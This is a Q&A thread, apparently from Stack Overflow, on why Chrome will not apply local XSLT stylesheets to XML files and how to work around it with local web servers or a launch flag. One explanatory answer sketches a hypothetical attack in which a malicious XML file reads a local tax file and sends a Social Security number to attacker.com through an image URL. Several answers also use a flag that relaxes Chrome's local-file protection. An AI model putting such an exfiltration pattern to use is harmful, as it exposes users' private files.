101

I was looking into xslt and started testing with the examples on w3schools.

However, when I save the xml and xsl in files and try opening them locally, chrome won't perform the xsl transform. It just shows a blank page.

I have added the<?xml-stylesheet type="text/xsl" href="style.xsl"> tag to the xml document, and firefox renders it as it is supposed to look. Also, if I look at the files through a web server, chrome displays the file as it is supposed to look.

Is it that chrome has a problem finding the stylesheet information when the link is local? Changing the href to file:///C:/xsl/style.xsl didn't make any difference.

Update: This seems to be a side effect of a security-policy to not treat file:///* as same origin. This makes the following error appear in the console:

Unsafe attempt to load URL file:///C:/xsl-rpg/style.xsl from frame with URL file:///C:/xsl-rpg/data.xml. Domains, protocols and ports must match.

nwellnhof
  • 32,319
  • 7
  • 89
  • 113
Zaz
  • 3,017
  • 2
  • 21
  • 28

8 Answers8

86

The short answer is "No, use one of the diverse set of browsers out there".

The reason this doesn't work is due to a security concern that Chrome has addressed in a controversial way[1][2][3][4], by blocking XML files from accessing local XSLT files in the same directory, while HTML files can access .CSS files in the same directory just fine.

Across the issues cited above, users have asked for a clearer error message (since the domains, protocols and ports do in fact match), or at least displaying the XML without the styling. Chrome developers have ignored these requests.

Dan Dascalescu
  • 143,271
  • 52
  • 317
  • 404
Zaz
  • 3,017
  • 2
  • 21
  • 28
  • 19
    While their [security concern](https://code.google.com/p/chromium/issues/detail?id=4197#c14) makes sense, XML files should be able to load XSL stylesheets from the same directory, just as HTML files can load images and scripts from the same directory. There's an [issue you can star](https://code.google.com/p/chromium/issues/detail?id=47416) but the Chrome dev team has banned new comments on it - despite the fact that they complained they can't quantify how badly users wanted the local file origin to be relaxed. – Dan Dascalescu Dec 25 '13 at 03:40
  • 1
    Interesting fact: Safari on Mac (8.0) works just fine with local XSLT, but Safari on iOS (8) simulator (and I suppose on iOS as well) I got the same error like in Chrome "Domains, protocols and ports must match.". But if I'm to implement UIWebView in the app and load XML with XSLT everything works OK. – Paweł Brewczynski Jan 14 '15 at 08:54
  • little point in using another browser when the task is to fix particular xslt rendering in chrome browsers... – n611x007 Jan 18 '16 at 14:18
  • One approach that works with Chromium is to inline the XSL file into the XML file as a data:text/xsl URI. – EricLaw Apr 06 '20 at 17:57
60

You can do this locally by running Chrome with --allow-file-access-from-files flag.

On OS X, from Terminal app run:
/Applications/Google\ Chrome.app/contents/MacOS/Google\ Chrome --allow-file-access-from-files

On Windows: from the command prompt run:
path\to\your\chrome\chrome.exe --allow-file-access-from-files

Note: You will probably have to quit Chrome if it is currently running.

Giorgi Tsiklauri
  • 9,715
  • 8
  • 45
  • 66
Jake Burton
  • 836
  • 9
  • 9
  • This doesn't seem to be working for me on Windows 7. I found chrome.exe located here: `C:\Program Files (x86)\Google\Chrome\Application`, and the --allow-file-access-from-files command executes just fine, but my local XML document (transformed by a local XSLT file) is not displayed. – Rick Jun 27 '14 at 21:32
  • 2
    Maybe you have to kill all running windows processes for chrome.exe in the windows task manager by hand. For me, this worked. – Christian Schulzendorff Mar 16 '15 at 16:30
  • 1
    `/Applications/Google\ Chrome\ Canary.app/Contents/MacOS/Google\ Chrome\ Canary --allow-file-access-from-files` worked for me. Obviously I'm running the Chrome Canary. After running this command, a new Chrome window should open and let you perform your XSL Transform. – SeanLF Jul 16 '15 at 15:04
  • 2
    Faster on Windows 7: Window key + R; "chrome --allow-file-access-from-files"; Enter. – Aaron Campbell Aug 24 '15 at 17:27
  • 1
    Or in PowerShell (kills previous chromes for you): `get-process chrome | stop-process; start-process chrome --allow-file-access-from-files` – Aaron Campbell Aug 24 '15 at 17:30
  • Does not currently work with latest build of canary. – cerd Sep 15 '15 at 22:09
  • Good that this is disabled when we close the window. – BetterLateThanNever Aug 30 '16 at 17:24
  • Seems this indeed works, but you indeed need to close all instances of Chrome and then restart before it does. – Nyerguds Oct 25 '16 at 11:33
  • It's been a few years since the original posting... The above Mac command still works on version Chrome 68.0.3440.106 – PatrickReagan Aug 29 '18 at 19:04
  • Still works in December 2021 – Dave Dec 22 '21 at 03:38
28

If you want to stick to the OP, the answer is No (as others have pointed out) but one way to fix the problem is to run a simple webserver and open files via http in chrome. If you have python 2.x installed, you can run a webserver by typing:

python -m SimpleHTTPServer

Or in python 3.x :

python3 -m http.server

and then open file using http://localhost:8000/yourfile.xml in chrome. Hopefully you just want to get your work done and its not a crucial thing to have to open file using file://

Arnaud P
  • 12,022
  • 7
  • 56
  • 67
morpheus
  • 18,676
  • 24
  • 96
  • 159
  • This is an old post, but great tip! I used http-server npm package myself :) – jamiebarrow Dec 16 '20 at 16:37
  • This is the universal solution and working across all platforms instead of figure out how to disable CORS on different browsers. Thumbs up! – yancyn Oct 05 '21 at 08:22
4

It took a bit of deciphering on the Chrome Bug page - they are very keen on not explaining what the problem is, and why they chose breaking everyone rather than not breaking everyone.

Assume i have an XML file - somewhere - on my hard drive, e.g.:

C:\Users\Ian\Documents\Taxes\StudioTaxReturn_2015.xml

And a malicious entity - somehow - managed to drop a malicious Xml file on my computer, e.g.:

C:\Users\Ian\AppData\LocalLow\Temp\TrojanVirusWorm.xml

Imagine TrojanVirusWorm.xml contains a stylesheet Processing Instruction (PI):

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="file://C:/Users/Ian/Documents/Taxes/StudioTaxReturn_2015.xml""?>

The attacker then instructs my browser to navigate to the locally saved trojanVirusWorm.xml file.

Apparently there's a way that an XML file can read the contents of the XSD file (rather than being transformed by the XSD file):

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="file://C:/Users/Ian/Documents/Taxes/StudioTaxReturn_2015.xml""?>
   <!--And then a miracle happens, and this XML file is able to read
       the contents of the stylesheet xml file-->
<html>
   <img src="http://attacker.com/UploadSocialSecurityNumber&ssn=..."></img>
</html>

I don't understand how an XML file can read a stylesheet file. But the Chrome team assures us that it's a danger, and that it cannot be solved.

Every other browser solved it. They solved it because it's not a problem.

Ian Boyd
  • 246,734
  • 253
  • 869
  • 1,219
4

My workaround to see an xml according to an xsl file

Suppose we have an some_file.xml with headers:

<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="https://some-site.com/Common.xsl"?>
  1. We download the file https://some-site.com/Common.xsl and place it next to the some_file.xml
  2. Change part of our header from href="https://some-site.com/Common.xsl" to href="http://localhost:8001/Common.xsl"
  3. Run in the directory with our files - python3 -m http.server 8001
  4. Open in any browser http://localhost:8001/some_file.xml
Greg Eremeev
  • 1,760
  • 5
  • 23
  • 33
1

  1. Create a batch file like as below and save it to a location for ex: chromex.cmd.

    "C:\Program Files\Google\Chrome\Application\Chrome.exe" --user-data-dir=C:\Temp --allow-file-access-from-files %1

  2. set default app to chromex.cmd for .xml files .

M.K
  • 1,464
  • 2
  • 24
  • 46
Yunus Emre Kuyumcu
  • 11
  • 1
0

You can enable Chrome to render the XSL file by changing your browser settings. A safer approach would be to access it via a local webserver, such as Visual Studio Code Live Server or Apache. See XSLT Won't Render on Local Files for steps.

Ryan C. Perry
  • 31
  • 5
0

The simplest and quick workaround for this is to install the Web Server for Chrome which is open source.

https://chrome.google.com/webstore/detail/web-server-for-chrome/ofhbbkphhbklhfoeikjpcbhemlocgigb?hl=en

Once installed need to select a folder which will can be accessible as the server from the Chrome tab with default URL as - ​http://127.0.0.1:8887/

Now one can put XML files and stylesheet folder/files under the selected folder in step 2. XML file should have reference to stylesheet file and can directly open the XML file to view the stylesheet.

Bharat Darakh
  • 325
  • 4
  • 11